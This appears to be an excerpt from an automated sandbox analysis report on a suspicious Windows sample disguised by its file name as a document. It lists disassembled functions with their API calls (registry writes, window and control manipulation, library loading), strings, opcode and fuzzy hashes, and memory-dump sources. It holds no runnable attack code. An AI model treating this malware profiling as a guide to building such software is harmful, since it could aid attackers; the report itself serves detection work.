                                                        • Opcode ID: 64899ea08c1236c56f0ec6f0200ab39f4b3e04b58e348cd127619891624533e9
                                                        • Instruction ID: 47f7635dad0bc453ff16f5073a41b30dee0ac8e5f0944c7a02da63cc21dffcf6
                                                        • Opcode Fuzzy Hash: 64899ea08c1236c56f0ec6f0200ab39f4b3e04b58e348cd127619891624533e9
                                                        • Instruction Fuzzy Hash: E2B19E71A0021AEFDB10DFA8DC45BAD7BB4FB08314F11822AFA15A7290DB78E841DB55
                                                        Function 0077352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00773626
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,007ADBF0,00000000,?,00000000,?,?), ref: 00773694
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007736DC
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00773765
                                                        • RegCloseKey.ADVAPI32(?), ref: 00773A85
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00773A92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: abb612274eeee1d799bd70febf5e85c55de8ecc075917330e71ee835c1420955
                                                        • Instruction ID: 29afd7932c7dc516aac266ad0c8e2417aad50cacdbd3ddc8560665c9d1aa12d4
                                                        • Opcode Fuzzy Hash: abb612274eeee1d799bd70febf5e85c55de8ecc075917330e71ee835c1420955
                                                        • Instruction Fuzzy Hash: 54023A75200611DFCB14EF28C895E6AB7E5FF89720F05845DF88A9B2A2DB38ED41CB41
                                                        Function 007769C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00776A52
                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00776B12
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                        • API String ID: 3974292440-719923060
                                                        • Opcode ID: b5b11ac70a451a2d5f078b4df5be44c7cf90631986b79e983e502e4ab91a44f5
                                                        • Instruction ID: c23739e928b0363eadf7676ac6e47e2a794f29dfc45ffc6d63162c2d26b4c047
                                                        • Opcode Fuzzy Hash: b5b11ac70a451a2d5f078b4df5be44c7cf90631986b79e983e502e4ab91a44f5
                                                        • Instruction Fuzzy Hash: ABA19170204601DBCB18EF24C855BAAB3A6EF85354F14C86DF89A9B3D6DB38ED05CB51
                                                        Function 0074DD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0074DD87
                                                        • __swprintf.LIBCMT ref: 0074DE28
                                                        • _wcscmp.LIBCMT ref: 0074DE3B
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0074DE90
                                                        • _wcscmp.LIBCMT ref: 0074DECC
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0074DF03
                                                        • GetDlgCtrlID.USER32(?), ref: 0074DF55
                                                        • GetWindowRect.USER32(?,?), ref: 0074DF8B
                                                        • GetParent.USER32(?), ref: 0074DFA9
                                                        • ScreenToClient.USER32(00000000), ref: 0074DFB0
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0074E02A
                                                        • _wcscmp.LIBCMT ref: 0074E03E
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0074E064
                                                        • _wcscmp.LIBCMT ref: 0074E078
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                        • String ID: %s%u
                                                        • API String ID: 3119225716-679674701
                                                        • Opcode ID: d44f65367d22ddb1694c654f953bb1ea21f9a00f6ec14349e571ab3b649dc849
                                                        • Instruction ID: da1038f4a08e17d0040b37681c41233bc06ba4003951323f5b7a9b8f372e5ee9
                                                        • Opcode Fuzzy Hash: d44f65367d22ddb1694c654f953bb1ea21f9a00f6ec14349e571ab3b649dc849
                                                        • Instruction Fuzzy Hash: 4BA1CF71604706EFD724DF64C888FAAB7A8FF44350F10852AF9A9C2191DB78ED46CB91
                                                        Function 0074E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0074E6E1
                                                        • _wcscmp.LIBCMT ref: 0074E6F2
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0074E71A
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0074E737
                                                        • _wcscmp.LIBCMT ref: 0074E755
                                                        • _wcsstr.LIBCMT ref: 0074E766
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0074E79E
                                                        • _wcscmp.LIBCMT ref: 0074E7AE
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0074E7D5
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0074E81E
                                                        • _wcscmp.LIBCMT ref: 0074E82E
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0074E856
                                                        • GetWindowRect.USER32(00000004,?), ref: 0074E8BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: 9fa614c54a3a75f03df79f61366ec61a4666c81003a373a521a166d46d21c9dd
                                                        • Instruction ID: 9696aad5ed0b233d50dda1482e13010e79d704df5fce13c17db654197da629eb
                                                        • Opcode Fuzzy Hash: 9fa614c54a3a75f03df79f61366ec61a4666c81003a373a521a166d46d21c9dd
                                                        • Instruction Fuzzy Hash: 8F81AE31008205DBDB15CF54C885FAA7BE8FF54764F04846AFD899A096DB38ED46CBA2
                                                        Function 0074E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: e311a80b2291e25c6da34bd230dd8893707ad899043b0b022a370ca947e24ee0
                                                        • Instruction ID: 75c80d4f72e9d63ebd89161b4b804e4ac3f53a6125ce694eaba04de07d57cc9c
                                                        • Opcode Fuzzy Hash: e311a80b2291e25c6da34bd230dd8893707ad899043b0b022a370ca947e24ee0
                                                        • Instruction Fuzzy Hash: 7931A971A48205E6DB28EA64CD57FEEB3A46B10B24F60042CF451B10D3FF9DAF15C662
                                                        Function 0074F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadIconW.USER32(00000063), ref: 0074F8AB
                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0074F8BD
                                                        • SetWindowTextW.USER32(?,?), ref: 0074F8D4
                                                        • GetDlgItem.USER32(?,000003EA), ref: 0074F8E9
                                                        • SetWindowTextW.USER32(00000000,?), ref: 0074F8EF
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0074F8FF
                                                        • SetWindowTextW.USER32(00000000,?), ref: 0074F905
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0074F926
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0074F940
                                                        • GetWindowRect.USER32(?,?), ref: 0074F949
                                                        • SetWindowTextW.USER32(?,?), ref: 0074F9B4
                                                        • GetDesktopWindow.USER32 ref: 0074F9BA
                                                        • GetWindowRect.USER32(00000000), ref: 0074F9C1
                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0074FA0D
                                                        • GetClientRect.USER32(?,?), ref: 0074FA1A
                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0074FA3F
                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0074FA6A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                        • String ID:
                                                        • API String ID: 3869813825-0
                                                        • Opcode ID: d9c4573863eb6aa7d967c08ad2cf49dd5137dc0399861b8f864ded75a4e9101a
                                                        • Instruction ID: 7f30589ed4a28b47add46dbf40838d471722b14e6858bc564f8796c714f46b62
                                                        • Opcode Fuzzy Hash: d9c4573863eb6aa7d967c08ad2cf49dd5137dc0399861b8f864ded75a4e9101a
                                                        • Instruction Fuzzy Hash: 6F513A71900709EFDB209FA8CD89F6EBBF5FF04744F004929E696A65A0C778AD45CB14
                                                        Function 0077CC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0077CD0B
                                                        • DestroyWindow.USER32(?,?), ref: 0077CD83
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0077CE04
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0077CE26
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0077CE35
                                                        • DestroyWindow.USER32(?), ref: 0077CE52
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00710000,00000000), ref: 0077CE85
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0077CEA4
                                                        • GetDesktopWindow.USER32 ref: 0077CEB9
                                                        • GetWindowRect.USER32(00000000), ref: 0077CEC0
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0077CED2
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0077CEEA
                                                          • Part of subcall function 0072B155: GetWindowLongW.USER32(?,000000EB), ref: 0072B166
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                        • String ID: 0$tooltips_class32
                                                        • API String ID: 1297703922-3619404913
                                                        • Opcode ID: 3f46dd5163f33ee913140df635c31208a947ea0699578ffa8d6b985c54a4e655
                                                        • Instruction ID: b2820eb72a72b05060e577e8c0318c99066c6e06e786a7ec86eddc0db42cfbbe
                                                        • Opcode Fuzzy Hash: 3f46dd5163f33ee913140df635c31208a947ea0699578ffa8d6b985c54a4e655
                                                        • Instruction Fuzzy Hash: 08719C71140309AFDB25CF28CC45FAA3BF9EB88744F84851DF989972A1D778E802DB15
                                                        Function 0075B428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000000), ref: 0075B46D
                                                        • VariantCopy.OLEAUT32(?,?), ref: 0075B476
                                                        • VariantClear.OLEAUT32(?), ref: 0075B482
                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0075B561
                                                        • __swprintf.LIBCMT ref: 0075B591
                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 0075B5BD
                                                        • VariantInit.OLEAUT32(?), ref: 0075B63F
                                                        • SysFreeString.OLEAUT32(00000016), ref: 0075B6D1
                                                        • VariantClear.OLEAUT32(?), ref: 0075B727
                                                        • VariantClear.OLEAUT32(?), ref: 0075B736
                                                        • VariantInit.OLEAUT32(00000000), ref: 0075B772
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                        • API String ID: 3730832054-3931177956
                                                        • Opcode ID: e44555719d3a7d0718ef5dbc31950902124376c6a99e4188301190f03edd3f70
                                                        • Instruction ID: c6b2323d9f9aaba68753d79bd0b40d551a6a17e75cb8356cbe79607443349f49
                                                        • Opcode Fuzzy Hash: e44555719d3a7d0718ef5dbc31950902124376c6a99e4188301190f03edd3f70
                                                        • Instruction Fuzzy Hash: C6C1F171A00615EBCB20DF65D488BB9B7B4FF45702F248466EC059B192DBBCEC48DBA1
                                                        Function 00776F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00776FF9
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00777044
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-4258414348
                                                        • Opcode ID: ec5d3f66ae5dc976eb6acf826ed0b0fac7e3b301c6e66bfe665fda58b8e35685
                                                        • Instruction ID: b70037d4d0f34fd6232b13ed0113037ddef3f1ca9779498ee1a39508c7d22131
                                                        • Opcode Fuzzy Hash: ec5d3f66ae5dc976eb6acf826ed0b0fac7e3b301c6e66bfe665fda58b8e35685
                                                        • Instruction Fuzzy Hash: DE917434204711DFCB18EF14C855A69B7E2AF94390F04886DF8965B393DB39ED46CB82
                                                        Function 0077E305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0077E3BB
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00779615,?), ref: 0077E417
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0077E457
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0077E49C
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0077E4D3
                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,00779615,?), ref: 0077E4DF
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0077E4EF
                                                        • DestroyCursor.USER32(?), ref: 0077E4FE
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0077E51B
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0077E527
                                                          • Part of subcall function 00731BC7: __wcsicmp_l.LIBCMT ref: 00731C50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                        • String ID: .dll$.exe$.icl
                                                        • API String ID: 3907162815-1154884017
                                                        • Opcode ID: d8bbf49c7c4960a5f31b0abf5f053a35b3a2f4262dc86c4f8a29f9bb85948fee
                                                        • Instruction ID: 2ae9fd752b187db350bde355b4d25a18044b5fa4c56aa0c42259d0a9bf4ea2af
                                                        • Opcode Fuzzy Hash: d8bbf49c7c4960a5f31b0abf5f053a35b3a2f4262dc86c4f8a29f9bb85948fee
                                                        • Instruction Fuzzy Hash: 7761BEB1500214FAEF24DF64CC45FEE77A8AB08760F108156F919E71D1DB789E90C7A0
                                                        Function 00760E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 00760EFF
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00760F0F
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00760F1B
                                                        • __wsplitpath.LIBCMT ref: 00760F79
                                                        • _wcscat.LIBCMT ref: 00760F91
                                                        • _wcscat.LIBCMT ref: 00760FA3
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00760FB8
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00760FCC
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00760FFE
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0076101F
                                                        • _wcscpy.LIBCMT ref: 0076102B
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0076106A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                        • String ID: *.*
                                                        • API String ID: 3566783562-438819550
                                                        • Opcode ID: 8369485d6bdb2a10a39c75577983d37a31f3b3e7563fb39c668a42658badccc3
                                                        • Instruction ID: 8ed895d9ca4becf0d37596a985d29a38338a90bb2532cc158c31578e77983b8d
                                                        • Opcode Fuzzy Hash: 8369485d6bdb2a10a39c75577983d37a31f3b3e7563fb39c668a42658badccc3
                                                        • Instruction Fuzzy Hash: 23614071504345EFD710EF64C848A9BB3E8FF89310F04891EF99697251EB39EA45CB92
                                                        Function 0075DAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        • CharLowerBuffW.USER32(?,?), ref: 0075DB26
                                                        • GetDriveTypeW.KERNEL32 ref: 0075DB73
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0075DBBB
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0075DBF2
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0075DC20
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        Strings
                                                        Memory Dump Source
